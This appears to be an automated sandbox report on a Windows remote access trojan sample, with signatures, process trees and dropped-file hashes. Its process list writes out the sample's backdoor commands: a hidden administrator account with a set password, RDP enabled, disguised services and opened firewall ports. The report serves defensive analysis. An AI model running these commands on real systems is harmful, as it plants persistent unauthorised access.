Malware Analysis Report

2024-10-16 05:10

Sample ID 240905-3e8b4atfrl
Target ce24e3f6a77491b84dab3c0a6b0203a1_JaffaCakes118
SHA256 48a16449873f16df73c4468805415769a863062802fdcb30568bf5bb2170bf17
Tags
defense_evasion discovery evasion execution persistence privilege_escalation ammyyadmin rat
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

48a16449873f16df73c4468805415769a863062802fdcb30568bf5bb2170bf17

Threat Level: Known bad

The file ce24e3f6a77491b84dab3c0a6b0203a1_JaffaCakes118 was found to be: Known bad.

Malicious Activity Summary

defense_evasion discovery evasion execution persistence privilege_escalation ammyyadmin rat

Ammyy Admin

AmmyyAdmin payload

Grants admin privileges

Sets service image path in registry

Creates new service(s)

Stops running service(s)

Modifies Windows Firewall

Executes dropped EXE

Loads dropped DLL

Password Policy Discovery

Hide Artifacts: Hidden Users

Launches sc.exe

Permission Groups Discovery: Local Groups

Event Triggered Execution: Netsh Helper DLL

System Location Discovery: System Language Discovery

Unsigned PE

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

Runs net.exe

Suspicious use of SetWindowsHookEx

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-09-05 23:26

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-09-05 23:26

Reported

2024-09-05 23:29

Platform

win7-20240708-en

Max time kernel

118s

Max time network

119s

Command Line

"C:\Users\Admin\AppData\Local\Temp\ce24e3f6a77491b84dab3c0a6b0203a1_JaffaCakes118.exe"

Signatures

Grants admin privileges

Creates new service(s)

persistence execution

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A

Sets service image path in registry

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\PlugAndPlay\ImagePath = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Network Shortcuts\\svchost.exe -service -debug" C:\Windows\SysWOW64\REG.exe N/A

Stops running service(s)

evasion execution

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Network Shortcuts\termserv.exe N/A

Password Policy Discovery

discovery

Hide Artifacts: Hidden Users

defense_evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\Microsoft = "0" C:\Windows\SysWOW64\REG.exe N/A

Event Triggered Execution: Netsh Helper DLL

persistence privilege_escalation
Description Indicator Process Target
Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A

Permission Groups Discovery: Local Groups

discovery

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\REG.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\REG.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\REG.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\sc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\sc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\sc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\REG.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\REG.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\sc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\sc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Network Shortcuts\termserv.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\sc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\sc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\sc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\sc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\REG.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\sc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\ce24e3f6a77491b84dab3c0a6b0203a1_JaffaCakes118.exe N/A

Runs net.exe

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\ce24e3f6a77491b84dab3c0a6b0203a1_JaffaCakes118.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1172 wrote to memory of 1720 N/A C:\Users\Admin\AppData\Local\Temp\ce24e3f6a77491b84dab3c0a6b0203a1_JaffaCakes118.exe C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Network Shortcuts\termserv.exe
PID 1172 wrote to memory of 1720 N/A C:\Users\Admin\AppData\Local\Temp\ce24e3f6a77491b84dab3c0a6b0203a1_JaffaCakes118.exe C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Network Shortcuts\termserv.exe
PID 1172 wrote to memory of 1720 N/A C:\Users\Admin\AppData\Local\Temp\ce24e3f6a77491b84dab3c0a6b0203a1_JaffaCakes118.exe C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Network Shortcuts\termserv.exe
PID 1172 wrote to memory of 1720 N/A C:\Users\Admin\AppData\Local\Temp\ce24e3f6a77491b84dab3c0a6b0203a1_JaffaCakes118.exe C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Network Shortcuts\termserv.exe
PID 1172 wrote to memory of 2828 N/A C:\Users\Admin\AppData\Local\Temp\ce24e3f6a77491b84dab3c0a6b0203a1_JaffaCakes118.exe C:\Windows\SysWOW64\sc.exe
PID 1172 wrote to memory of 2828 N/A C:\Users\Admin\AppData\Local\Temp\ce24e3f6a77491b84dab3c0a6b0203a1_JaffaCakes118.exe C:\Windows\SysWOW64\sc.exe
PID 1172 wrote to memory of 2828 N/A C:\Users\Admin\AppData\Local\Temp\ce24e3f6a77491b84dab3c0a6b0203a1_JaffaCakes118.exe C:\Windows\SysWOW64\sc.exe
PID 1172 wrote to memory of 2828 N/A C:\Users\Admin\AppData\Local\Temp\ce24e3f6a77491b84dab3c0a6b0203a1_JaffaCakes118.exe C:\Windows\SysWOW64\sc.exe
PID 1172 wrote to memory of 2944 N/A C:\Users\Admin\AppData\Local\Temp\ce24e3f6a77491b84dab3c0a6b0203a1_JaffaCakes118.exe C:\Windows\SysWOW64\sc.exe
PID 1172 wrote to memory of 2944 N/A C:\Users\Admin\AppData\Local\Temp\ce24e3f6a77491b84dab3c0a6b0203a1_JaffaCakes118.exe C:\Windows\SysWOW64\sc.exe
PID 1172 wrote to memory of 2944 N/A C:\Users\Admin\AppData\Local\Temp\ce24e3f6a77491b84dab3c0a6b0203a1_JaffaCakes118.exe C:\Windows\SysWOW64\sc.exe
PID 1172 wrote to memory of 2944 N/A C:\Users\Admin\AppData\Local\Temp\ce24e3f6a77491b84dab3c0a6b0203a1_JaffaCakes118.exe C:\Windows\SysWOW64\sc.exe
PID 1172 wrote to memory of 2544 N/A C:\Users\Admin\AppData\Local\Temp\ce24e3f6a77491b84dab3c0a6b0203a1_JaffaCakes118.exe C:\Windows\SysWOW64\sc.exe
PID 1172 wrote to memory of 2544 N/A C:\Users\Admin\AppData\Local\Temp\ce24e3f6a77491b84dab3c0a6b0203a1_JaffaCakes118.exe C:\Windows\SysWOW64\sc.exe
PID 1172 wrote to memory of 2544 N/A C:\Users\Admin\AppData\Local\Temp\ce24e3f6a77491b84dab3c0a6b0203a1_JaffaCakes118.exe C:\Windows\SysWOW64\sc.exe
PID 1172 wrote to memory of 2544 N/A C:\Users\Admin\AppData\Local\Temp\ce24e3f6a77491b84dab3c0a6b0203a1_JaffaCakes118.exe C:\Windows\SysWOW64\sc.exe
PID 1172 wrote to memory of 2700 N/A C:\Users\Admin\AppData\Local\Temp\ce24e3f6a77491b84dab3c0a6b0203a1_JaffaCakes118.exe C:\Windows\SysWOW64\net.exe
PID 1172 wrote to memory of 2700 N/A C:\Users\Admin\AppData\Local\Temp\ce24e3f6a77491b84dab3c0a6b0203a1_JaffaCakes118.exe C:\Windows\SysWOW64\net.exe
PID 1172 wrote to memory of 2700 N/A C:\Users\Admin\AppData\Local\Temp\ce24e3f6a77491b84dab3c0a6b0203a1_JaffaCakes118.exe C:\Windows\SysWOW64\net.exe
PID 1172 wrote to memory of 2700 N/A C:\Users\Admin\AppData\Local\Temp\ce24e3f6a77491b84dab3c0a6b0203a1_JaffaCakes118.exe C:\Windows\SysWOW64\net.exe
PID 2700 wrote to memory of 2564 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2700 wrote to memory of 2564 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2700 wrote to memory of 2564 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2700 wrote to memory of 2564 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1172 wrote to memory of 2924 N/A C:\Users\Admin\AppData\Local\Temp\ce24e3f6a77491b84dab3c0a6b0203a1_JaffaCakes118.exe C:\Windows\SysWOW64\net.exe
PID 1172 wrote to memory of 2924 N/A C:\Users\Admin\AppData\Local\Temp\ce24e3f6a77491b84dab3c0a6b0203a1_JaffaCakes118.exe C:\Windows\SysWOW64\net.exe
PID 1172 wrote to memory of 2924 N/A C:\Users\Admin\AppData\Local\Temp\ce24e3f6a77491b84dab3c0a6b0203a1_JaffaCakes118.exe C:\Windows\SysWOW64\net.exe
PID 1172 wrote to memory of 2924 N/A C:\Users\Admin\AppData\Local\Temp\ce24e3f6a77491b84dab3c0a6b0203a1_JaffaCakes118.exe C:\Windows\SysWOW64\net.exe
PID 2924 wrote to memory of 2704 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2924 wrote to memory of 2704 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2924 wrote to memory of 2704 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2924 wrote to memory of 2704 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1172 wrote to memory of 2592 N/A C:\Users\Admin\AppData\Local\Temp\ce24e3f6a77491b84dab3c0a6b0203a1_JaffaCakes118.exe C:\Windows\SysWOW64\REG.exe
PID 1172 wrote to memory of 2592 N/A C:\Users\Admin\AppData\Local\Temp\ce24e3f6a77491b84dab3c0a6b0203a1_JaffaCakes118.exe C:\Windows\SysWOW64\REG.exe
PID 1172 wrote to memory of 2592 N/A C:\Users\Admin\AppData\Local\Temp\ce24e3f6a77491b84dab3c0a6b0203a1_JaffaCakes118.exe C:\Windows\SysWOW64\REG.exe
PID 1172 wrote to memory of 2592 N/A C:\Users\Admin\AppData\Local\Temp\ce24e3f6a77491b84dab3c0a6b0203a1_JaffaCakes118.exe C:\Windows\SysWOW64\REG.exe
PID 1172 wrote to memory of 2820 N/A C:\Users\Admin\AppData\Local\Temp\ce24e3f6a77491b84dab3c0a6b0203a1_JaffaCakes118.exe C:\Windows\SysWOW64\REG.exe
PID 1172 wrote to memory of 2820 N/A C:\Users\Admin\AppData\Local\Temp\ce24e3f6a77491b84dab3c0a6b0203a1_JaffaCakes118.exe C:\Windows\SysWOW64\REG.exe
PID 1172 wrote to memory of 2820 N/A C:\Users\Admin\AppData\Local\Temp\ce24e3f6a77491b84dab3c0a6b0203a1_JaffaCakes118.exe C:\Windows\SysWOW64\REG.exe
PID 1172 wrote to memory of 2820 N/A C:\Users\Admin\AppData\Local\Temp\ce24e3f6a77491b84dab3c0a6b0203a1_JaffaCakes118.exe C:\Windows\SysWOW64\REG.exe
PID 1172 wrote to memory of 2532 N/A C:\Users\Admin\AppData\Local\Temp\ce24e3f6a77491b84dab3c0a6b0203a1_JaffaCakes118.exe C:\Windows\SysWOW64\net.exe
PID 1172 wrote to memory of 2532 N/A C:\Users\Admin\AppData\Local\Temp\ce24e3f6a77491b84dab3c0a6b0203a1_JaffaCakes118.exe C:\Windows\SysWOW64\net.exe
PID 1172 wrote to memory of 2532 N/A C:\Users\Admin\AppData\Local\Temp\ce24e3f6a77491b84dab3c0a6b0203a1_JaffaCakes118.exe C:\Windows\SysWOW64\net.exe
PID 1172 wrote to memory of 2532 N/A C:\Users\Admin\AppData\Local\Temp\ce24e3f6a77491b84dab3c0a6b0203a1_JaffaCakes118.exe C:\Windows\SysWOW64\net.exe
PID 1172 wrote to memory of 2556 N/A C:\Users\Admin\AppData\Local\Temp\ce24e3f6a77491b84dab3c0a6b0203a1_JaffaCakes118.exe C:\Windows\SysWOW64\net.exe
PID 1172 wrote to memory of 2556 N/A C:\Users\Admin\AppData\Local\Temp\ce24e3f6a77491b84dab3c0a6b0203a1_JaffaCakes118.exe C:\Windows\SysWOW64\net.exe
PID 1172 wrote to memory of 2556 N/A C:\Users\Admin\AppData\Local\Temp\ce24e3f6a77491b84dab3c0a6b0203a1_JaffaCakes118.exe C:\Windows\SysWOW64\net.exe
PID 1172 wrote to memory of 2556 N/A C:\Users\Admin\AppData\Local\Temp\ce24e3f6a77491b84dab3c0a6b0203a1_JaffaCakes118.exe C:\Windows\SysWOW64\net.exe
PID 1172 wrote to memory of 2616 N/A C:\Users\Admin\AppData\Local\Temp\ce24e3f6a77491b84dab3c0a6b0203a1_JaffaCakes118.exe C:\Windows\SysWOW64\net.exe
PID 1172 wrote to memory of 2616 N/A C:\Users\Admin\AppData\Local\Temp\ce24e3f6a77491b84dab3c0a6b0203a1_JaffaCakes118.exe C:\Windows\SysWOW64\net.exe
PID 1172 wrote to memory of 2616 N/A C:\Users\Admin\AppData\Local\Temp\ce24e3f6a77491b84dab3c0a6b0203a1_JaffaCakes118.exe C:\Windows\SysWOW64\net.exe
PID 1172 wrote to memory of 2616 N/A C:\Users\Admin\AppData\Local\Temp\ce24e3f6a77491b84dab3c0a6b0203a1_JaffaCakes118.exe C:\Windows\SysWOW64\net.exe
PID 1172 wrote to memory of 1268 N/A C:\Users\Admin\AppData\Local\Temp\ce24e3f6a77491b84dab3c0a6b0203a1_JaffaCakes118.exe C:\Windows\SysWOW64\net.exe
PID 1172 wrote to memory of 1268 N/A C:\Users\Admin\AppData\Local\Temp\ce24e3f6a77491b84dab3c0a6b0203a1_JaffaCakes118.exe C:\Windows\SysWOW64\net.exe
PID 1172 wrote to memory of 1268 N/A C:\Users\Admin\AppData\Local\Temp\ce24e3f6a77491b84dab3c0a6b0203a1_JaffaCakes118.exe C:\Windows\SysWOW64\net.exe
PID 1172 wrote to memory of 1268 N/A C:\Users\Admin\AppData\Local\Temp\ce24e3f6a77491b84dab3c0a6b0203a1_JaffaCakes118.exe C:\Windows\SysWOW64\net.exe
PID 1172 wrote to memory of 2588 N/A C:\Users\Admin\AppData\Local\Temp\ce24e3f6a77491b84dab3c0a6b0203a1_JaffaCakes118.exe C:\Windows\SysWOW64\net.exe
PID 1172 wrote to memory of 2588 N/A C:\Users\Admin\AppData\Local\Temp\ce24e3f6a77491b84dab3c0a6b0203a1_JaffaCakes118.exe C:\Windows\SysWOW64\net.exe
PID 1172 wrote to memory of 2588 N/A C:\Users\Admin\AppData\Local\Temp\ce24e3f6a77491b84dab3c0a6b0203a1_JaffaCakes118.exe C:\Windows\SysWOW64\net.exe
PID 1172 wrote to memory of 2588 N/A C:\Users\Admin\AppData\Local\Temp\ce24e3f6a77491b84dab3c0a6b0203a1_JaffaCakes118.exe C:\Windows\SysWOW64\net.exe
PID 2532 wrote to memory of 1824 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2532 wrote to memory of 1824 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2532 wrote to memory of 1824 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2532 wrote to memory of 1824 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe

Processes

C:\Users\Admin\AppData\Local\Temp\ce24e3f6a77491b84dab3c0a6b0203a1_JaffaCakes118.exe

"C:\Users\Admin\AppData\Local\Temp\ce24e3f6a77491b84dab3c0a6b0203a1_JaffaCakes118.exe"

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Network Shortcuts\termserv.exe

"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Network Shortcuts\termserv.exe" -silent

C:\Windows\SysWOW64\sc.exe

sc start mnmsrvc

C:\Windows\SysWOW64\sc.exe

sc Start TlntSvr

C:\Windows\SysWOW64\sc.exe

sc Start TermService

C:\Windows\SysWOW64\net.exe

net start FastUserSwitchingCompatibility

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 start FastUserSwitchingCompatibility

C:\Windows\SysWOW64\net.exe

net start TermService

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 start TermService

C:\Windows\SysWOW64\REG.exe

REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

C:\Windows\SysWOW64\REG.exe

REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fSingleSessionPerUser /t REG_DWORD /d 0 /f

C:\Windows\SysWOW64\net.exe

net user Microsoft skj2g43 /add /EXPIRES:NEVER /active:yes

C:\Windows\SysWOW64\net.exe

net localgroup Microsoft /add

C:\Windows\SysWOW64\net.exe

net localgroup Àäìèíèñòðàòîðû Microsoft /add

C:\Windows\SysWOW64\net.exe

net localgroup Administrators Microsoft /add

C:\Windows\SysWOW64\net.exe

net accounts /maxpwage:unlimited

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 user Microsoft skj2g43 /add /EXPIRES:NEVER /active:yes

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 localgroup Àäìèíèñòðàòîðû Microsoft /add

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 localgroup Administrators Microsoft /add

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 localgroup Microsoft /add

C:\Windows\SysWOW64\REG.exe

REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v Microsoft /t REG_DWORD /d 0 /f

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 accounts /maxpwage:unlimited

C:\Windows\SysWOW64\sc.exe

sc stop "ProtocolWindows_ "

C:\Windows\SysWOW64\sc.exe

sc delete "ProtocolWindows_ "

C:\Windows\SysWOW64\sc.exe

sc create "ProtocolWindows_ " binpath= "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Network Shortcuts\lsass.exe" displayname= "Protocol HTTP/SSL " type= own start= auto error= ignore

C:\Windows\SysWOW64\sc.exe

sc description "ProtocolWindows_ " "Ýòà ñëóæáa îáåñïå÷èâàåò áåçîïañíûé ïðîòîêîë ïåðåäà÷è äàííûõ ãèïåðòåêñòà (HTTPS) äëÿ ñëóæáû HTTP. Åñëè ýòà ñëóæáà îòêëþ÷åía, ëþáûå ñëóæáû, êîòîðûå ÿâíî çaâèñÿò îò íåå, íå ìîãóò áûòü çàïóùåíû. "

C:\Windows\SysWOW64\sc.exe

sc stop "PlugAndPlay"

C:\Windows\SysWOW64\sc.exe

sc delete "PlugAndPlay"

C:\Windows\SysWOW64\sc.exe

sc create "PlugAndPlay" displayname= "PlugAndPlay " binpath= "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Network Shortcuts\svchost.exe -service -debug" type= own start= auto error= ignore

C:\Windows\SysWOW64\REG.exe

REG ADD "HKLM\SYSTEM\CurrentControlSet\services\PlugAndPlay" /v ImagePath /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Network Shortcuts\svchost.exe -service -debug" /f

C:\Windows\SysWOW64\REG.exe

REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_REGDWORD /d 3389 /f

C:\Windows\SysWOW64\REG.exe

REG ADD "HKCU\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_LOCALMACHINE_LOCKDOWN" /v iexplore.exe /t REG_REGDWORD /d 0 /f

C:\Windows\SysWOW64\netsh.exe

netsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Network Shortcuts\svchost.exe" ENABLE

C:\Windows\SysWOW64\netsh.exe

netsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Network Shortcuts\lsass.exe" ENABLE

C:\Windows\SysWOW64\netsh.exe

netsh firewall add allowedprogram ctfmon.exe ENABLE

C:\Windows\SysWOW64\netsh.exe

netsh firewall add portopening protocol = TCP port = 3389 name = TCP

C:\Windows\SysWOW64\netsh.exe

netsh firewall add portopening protocol = TCP port = 31337 name = TCP

C:\Windows\SysWOW64\netsh.exe

netsh firewall add portopening protocol = TCP port = 80 name = TCP

C:\Windows\SysWOW64\netsh.exe

netsh firewall add portopening protocol = TCP port = 8080 name = TCP

Network

N/A

Files

memory/1172-0-0x0000000000400000-0x0000000000548000-memory.dmp

\Users\Admin\AppData\Roaming\Microsoft\Windows\Network Shortcuts\termserv.exe

MD5 c104fc64f8ed6950ce08a5d653e9e4d7
SHA1 e1186adecb3c647cbec0705df4a8aa80281790c9
SHA256 8ded98254676bb6a64435119df030d84e8186b75051b8a1e7928aa52c8bb3937
SHA512 2b6a7f44b34af744108769658391ff46e885f09f974c32f9a5b0b559bf9e93b1185acb8fe6841c74848e4e06ff9ee31aaca6a648d43f39ae16dcaa96d576335c

\??\PIPE\lsarpc

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

memory/1172-26-0x0000000000400000-0x0000000000548000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Network Shortcuts\lsass.exe

MD5 6e0966f100cb1f523179c0adba52d45a
SHA1 d3d27da135e1388bc6619bc3f81a3324d2e9d645
SHA256 71059380b8346728a26de74e7a721e63bd9f18e81f1eec76adeabd998fb13e3b
SHA512 3dbebfd08ab3df57fefe193cd98f6ab8aeeff3406d70cc56604d8d0144de2c2b18a56f99281c93d21849badd0d76cbb943d09ce6573271af94fefb4323fbeefd

